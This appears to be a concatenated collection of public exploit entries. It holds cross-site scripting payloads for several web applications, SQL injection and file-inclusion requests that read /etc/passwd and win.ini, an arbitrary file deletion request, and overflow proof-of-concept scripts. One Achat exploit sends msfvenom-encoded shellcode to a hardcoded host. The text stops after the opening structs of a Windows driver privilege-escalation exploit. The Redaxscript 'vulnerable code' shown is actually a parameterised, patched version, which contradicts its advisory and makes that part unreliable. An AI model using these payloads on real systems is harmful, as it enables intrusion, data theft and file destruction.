
source: https://www.securityfocus.com/bid/49033/info

Microsoft Visual Studio is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. 

https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed= 
            
#!/usr/bin/env python
##########################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )
# Vulnerable Software: Moo player 1.3.0
# Software Link: https://mooplayer.jaleco.com/
# Vendor site: https://mooplayer.jaleco.com/
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 01DDF92C ntdll.76FF71CD
# 01DDFF5C 43434343
# 42424242 *** CORRUPT ENTRY ***

# And the Stack

#	01DDFF44   41414141  AAAA
#	01DDFF48   41414141  AAAA
#	01DDFF4C   41414141  AAAA
#	01DDFF50   41414141  AAAA
#	01DDFF54   41414141  AAAA
#	01DDFF58   41414141  AAAA
#	01DDFF5C   42424242  BBBB  Pointer to next SEH record
#	01DDFF60   43434343  CCCC  SE handler
#	01DDFF64   00000000  ....
#	01DDFF68   44444444  DDDD
#	01DDFF6C   44444444  DDDD
#	01DDFF70   44444444  DDDD

# And the Registers

#	EAX 00000000
#	ECX 43434343
#	EDX 76FF71CD ntdll.76FF71CD
#	EBX 00000000
#	ESP 01DDF918
#	EBP 01DDF938
#	ESI 00000000
#	EDI 00000000
#	EIP 43434343
# Builds the crash-trigger playlist described in the notes above: an
# "http://" prefix, 264 bytes of filler, 4 bytes that land on the
# next-SEH pointer, 4 bytes that land on the SE handler, then padding
# up to `buffer` bytes in total.
head="http://"
buffer=10000
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "mooplay_poc.m3u"
# Note: `poc` already begins with `head`, so the file written below starts
# with the "http://" prefix twice.
f=open(file,"w")
f.write(head + poc);
f.close();

#SaMaN(@samanL33T)
            
# Exploit Title: Radexscript CMS 2.2.0 - SQL Injection vulnerability
# Google Dork: N/A
# Date: 02/09/2015
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://redaxscript.com/
# Software Link: http://redaxscript.com/download/releases
# Version: Redaxscript 2.2.0
# Tested on: Linux
# CVE : CVE-2015-1518


:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search



- Vulnerable parameter: $search_terms
- Vulnerable file:      redaxscript/includes/search.php
- Vulnerable function:  search_post()

- Vulnerable code:
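/**
 * Handles a submitted search form: validates the posted terms, queries the
 * articles table and echoes the matching, access-checked results.
 *
 * The user-controlled search terms are passed to the database as bound
 * parameters instead of being concatenated into the SQL string, which closes
 * the SQL injection reported above (CVE-2015-1518). The terms are still
 * matched with LIKE, so '%' and '_' inside a term act as wildcards; that only
 * affects which rows match, not the query structure.
 *
 * Reads: $_POST['search_terms'], ATTACK_BLOCKED, PREFIX, MY_GROUPS.
 * Output: echoes the HTML result list, or calls notification() on error.
 */
function search_post()
{
	/* defaults, so no branch below reads an undefined variable */

	$search_terms = '';
	$error = '';
	$output = '';
	$counter = 0;

	/* clean post */

	if (ATTACK_BLOCKED < 10)
	{
		$search_terms = clean($_POST['search_terms'], 5);
	}

	/* validate post (strlen() is byte-wise here, as before) */

	if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
	{
		$error = l('input_incorrect');
	}

	/* query results */

	else
	{
		$search = array_values(array_filter(explode(' ', $search_terms)));

		/* query search: every '?' is bound from $parameters in order */

		$query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = ? || language = \'\') && status = 1';
		$parameters = array((string) Redaxscript\Registry::get('language'));
		if ($search)
		{
			$clauses = array();
			foreach ($search as $value)
			{
				$clauses[] = '(title LIKE ? || description LIKE ? || keywords LIKE ? || text LIKE ?)';
				$pattern = '%' . $value . '%';
				$parameters[] = $pattern;
				$parameters[] = $pattern;
				$parameters[] = $pattern;
				$parameters[] = $pattern;
			}
			$query .= ' && (' . implode(' || ', $clauses) . ')';
		}
		$query .= ' ORDER BY date DESC LIMIT 50';
		$result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query, $parameters)->findArray();
		$num_rows = count($result);
		if ($num_rows === 0)
		{
			$error = l('search_no');
		}

		/* collect output */

		else
		{
			$accessValidator = new Redaxscript\Validator\Access();
			$output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>';
			$output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">';
			foreach ($result as $r)
			{
				/* if access granted */

				if ($accessValidator->validate($r['access'], MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
				{
					/* read the selected columns explicitly; a $$key loop would let a row clobber any local */

					$id = stripslashes($r['id']);
					$title = stripslashes($r['title']);
					$alias = stripslashes($r['alias']);
					$description = stripslashes($r['description']);
					$date = stripslashes($r['date']);
					$category = stripslashes($r['category']);

					/* prepare metadata */

					if ($description === '')
					{
						$description = $title;
					}
					$date = date(s('date'), strtotime($date));

					/* build route */

					if ((int) $category === 0)
					{
						$route = $alias;
					}
					else
					{
						$route = build_route('articles', $id);
					}

					/* collect item output */

					$output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>';
				}
				else
				{
					$counter++;
				}
			}
			$output .= '</ol></fieldset>';

			/* handle access: every row was filtered out */

			if ($num_rows === $counter)
			{
				$error = l('access_no');
			}
		}
	}

	/* handle error */

	if ($error)
	{
		notification(l('something_wrong'), $error);
	}
	else
	{
		echo $output;
	}
}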


:: SOLUTION ::
Update to Redaxscript 2.3.0

::INFORMATION DISCLOSURE::
- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 01/29/2015: Vendor releases patch
- 01/05/2015: ITAS Team publishes information


:: REFERENCE ::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html

::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).

:: DISCLAIMER ::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
            
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability

Date:
=============
08/02/2015

Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/

Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.

Affected Product(s):
====================
Chemtool 1.6.14 or older

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A memory corruption vulnerability was found in Chemtool 1.6.14. An
attacker can crash the software by supplying a crafted input file.
An attacker can also crash the software by passing an over-long filename.

b77a8000-b77a9000 r--s 00000000 08:01 152558
/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691
/usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691
/usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)

Proof of Concept (PoC):
=======================
These vulnerabilities can be exploited by local attackers with
user interaction.

First test. An attacker can generate a malicious file (.png format). This file
produces stack smashing.

#/usr/bin/ruby

# Writes 3000 'a' bytes to crash.png; the result is a plain filler blob,
# not a valid PNG image.
filler = 'a' * 3000

output_name = 'crash.png'
File.open(output_name, 'w') { |handle| handle.write(filler) }
puts 'file created!'

Second test. An attacker can pass an over-long filename. For example, this
program expects to receive a parameter; if that parameter is too long, it will
crash.

$chemtool $(perl -e 'print "A"x900')

How to perform:
=======================
1) You can test it with gdb by attaching to this application.
2) Run it; then pass the "crash.png" file generated by the Ruby
script to the application. Alternatively, run it with a long value as argv[1].

After performing the above steps the application will crash. Analyze it in gdb.

Solution - Fix & Patch:
=======================
Restrict the maximum working size. I believe that this bug does not have a
solution.

Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of
the local crash method.

Authors:
==================
Pablo González
            
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

# Encoded payload bytes produced by the msfvenom command quoted above
# (x86/unicode_mixed encoder, 512 bytes per the note). They are appended to
# the datagram built below and padded there to 1152 bytes.
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"


# Create a UDP socket
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Destination host and port are hard-coded; nothing is taken from argv.
server_address = ('192.168.91.130', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
# Assembles the oversized message: two "A0000000002#Main" headers each
# followed by a large run of filler, a short fixed byte sequence, the
# encoded payload `buf` padded to 1152 bytes, and a trailing terminator.
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40" 
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

# Python 2 print statement; this script does not run under Python 3 as-is.
print "---->{P00F}!"
i=0
# Sends `p` in 8192-byte datagrams, advancing by the count sendto() reports.
# Once more than 172000 bytes have gone out, a one-second pause precedes
# each further datagram.
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
            

u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete
files with the permissions of the web server using their absolute path or via
directory traversal sequences passed within the affected GET parameter.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5226
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php


29.12.2014

---


Target: C:\deleteme.txt
-----------------------

GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1
            

u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed via multiple parameters in multiple scripts is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5225
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php


29.12.2014

---


1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1

   name=album[INJECT]


2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1


3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1


4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1


5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1


6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1


7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1

   name=test[INJECT]&typ=e


8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1

   name=album2[INJECT]&ulinks=yes


9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1
            

u5CMS 3.9.3 Multiple Stored And Reflected XSS Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: u5CMS suffers from multiple stored and reflected cross-site scripting
vulnerabilities. Input passed to several POST and GET parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context of an
affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5223
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5223.php


29.12.2014

---


Reflected XSS:
==============

GET /u5cms/index.php?c=start"><script>alert(1)</script>&l=e&p=1&r= HTTP/1.1
GET /u5cms/index.php?i=1"><script>alert(2)</script>&p=1&c=start&l=d HTTP/1.1
GET /u5cms/index.php?c=start&l=e"><script>alert(3)</script>&p=1&r= HTTP/1.1
GET /u5cms/index.php?c=start&l=e&p=1"><script>alert(4)</script>&r= HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l%00%3balert(5)//&b=d HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l&b=%3balert(6)// HTTP/1.1
GET /u5cms/u5admin/copy.php?name=album"><img%20src%3da%20onerror%3dalert(7)> HTTP/1.1
GET /u5cms/u5admin/delete.php?name=a"><img%20src%3da%20onerror%3dalert(8)> HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../r/shortreference/shortreference_en.php.txt'%3balert(9)// HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d'%3balert(10)//&name=shortreference&f=../r/shortreference/shortreference_en.php.txt HTTP/1.1
GET /u5cms/u5admin/done.php?n=inserted%20test"><script>alert(11)</script> HTTP/1.1
GET /u5cms/u5admin/editor.php?c=c"><script>alert(12)</script> HTTP/1.1
POST /u5cms/u5admin/meta2.php?typ=a&uri=metai.php'%3balert(13)// HTTP/1.1
GET /u5cms/u5admin/notdone.php?n=wrong%20name,%20not%20deleted%20<script>alert(14)</script> HTTP/1.1
GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum'%3balert(15)//&typ=a HTTP/1.1
GET /u5cms/u5admin/sendfile.php?name=shortreference&l=_frd"><script>alert(16)</script>&typ=d HTTP/1.1
GET /u5cms/u5admin/characters.php?more=335&s=335"><script>alert(17)</script> HTTP/1.1


Stored XSS:
===========

<html>
  <body>
    <form action="http://10.0.50.3/u5cms/u5admin/savepage.php" method="POST">
      <input type="hidden" name="page" value='ZSL"><script>alert(document.cookie);</script>' />
      <input type="hidden" name="view" value="d" />
      <input type="hidden" name="ishomepage" value="1" />
      <input type="hidden" name="hidden" value="0" />
      <input type="hidden" name="logins" value="" />
      <input type="hidden" name="title_d" value="Test" />
      <input type="hidden" name="desc_d" value="" />
      <input type="hidden" name="key_d" value="" />
      <input type="hidden" name="content_d" value="Tstz" />
      <input type="hidden" name="title_e" value="ZSL" />
      <input type="hidden" name="desc_e" value="llll" />
      <input type="hidden" name="key_e" value="qqq" />
      <input type="hidden" name="content_e" value="AllTheWay" />
      <input type="hidden" name="title_f" value="None" />
      <input type="hidden" name="desc_f" value="" />
      <input type="hidden" name="key_f" value="" />
      <input type="hidden" name="content_f" value="Aloha" />
      <input type="hidden" name="coco" value="1423010603" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


--


<html>
  <body>
    <form action="http://10.0.50.3/u5cms/u5admin/new2.php?typ=e" method="POST">
      <input type="hidden" name="name" value='"><img%20src%3da%20onerror%3dalert("XSS")>' />
      <input type="hidden" name="typ" value="e" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
            

u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when
input passed through the 'f' parameter to the thumb.php script is not properly verified
before being used to include files. This can be exploited to include files from
local resources by their absolute path or via directory traversal sequences.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5224
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php


29.12.2014

---


GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1
            
# Exploit Title: StaMPi -  Local File Inclusion
# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
# Date: 16/2/15
# Author : e . V . E . L
# Contact: waleed200955@hotmail.com



PoC:

http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00
            
source: https://www.securityfocus.com/bid/49051/info

Softbiz Recipes Portal script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/[path]/admin/index.php?msg=[XSS]
http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
http://www.example.com/[path]/signinform.php?errmsg=[XSS]
http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS] 
            
source: https://www.securityfocus.com/bid/49090/info

OpenEMR is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OpenEMR 4.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<"> 
            
######################

# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss
            

# Date : 2015-02-11

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Vulnerability Disclosure Timeline:

2015-02-08:  Discovered vulnerability
2015-02-09:  Vendor Notification
2015-02-10:  Vendor Response/Feedback 
2015-02-10:  Vendor Send Fix/Patch 
2015-02-11:  Public Disclosure 

# Description

Wordpress Video Gallery 2.7 suffers from an SQL injection vulnerability.


######################

# PoC

http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]


#####################

# Fix/patch sent by apptha's developer

File: videogalleryrss.php

Change line n.47 

from:

		$vid             = filter_input(INPUT_GET,'vid');
to:

		$vid             = intval(filter_input(INPUT_GET,'vid'));

#####################

Discovered By : Claudio Viviani
        	http://www.homelab.it
        	info@homelab.it
        	homelabit@protonmail.ch

        	https://www.facebook.com/homelabit
        	https://twitter.com/homelabit
        	https://plus.google.com/+HomelabIt1/
		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
/*

Exploit Title    - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation
Date             - 10th February 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.softsphere.com
Tested Version   - 3.24
Driver Version   - 3.2.3.0 - dwall.sys
Tested on OS     - 32bit Windows XP SP3 
OSVDB            - http://www.osvdb.org/show/osvdb/117996
CVE ID           - CVE-2015-1515
Vendor fix url   - 
Fixed Version    - no fix
Fixed driver ver - 

*/


#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096


/* One entry of the module list returned by
   NtQuerySystemInformation(SystemModuleInformation). Only Base and
   ImageName are read in this file; the code treats Module[0] as the
   kernel image. */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
     HANDLE  Section;
     PVOID   MappedBase;
     PVOID   Base;
     ULONG   Size;
     ULONG   Flags;
     USHORT  Index;
     USHORT  NameLength;
     USHORT  LoadCount;
     USHORT  PathLength;
     CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 
/* Header of the SystemModuleInformation buffer: Count entries follow the
   count. Module is declared with one element; this file only reads
   Module[0]. */
typedef struct _SYSTEM_MODULE_INFORMATION {
     ULONG   Count;
     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

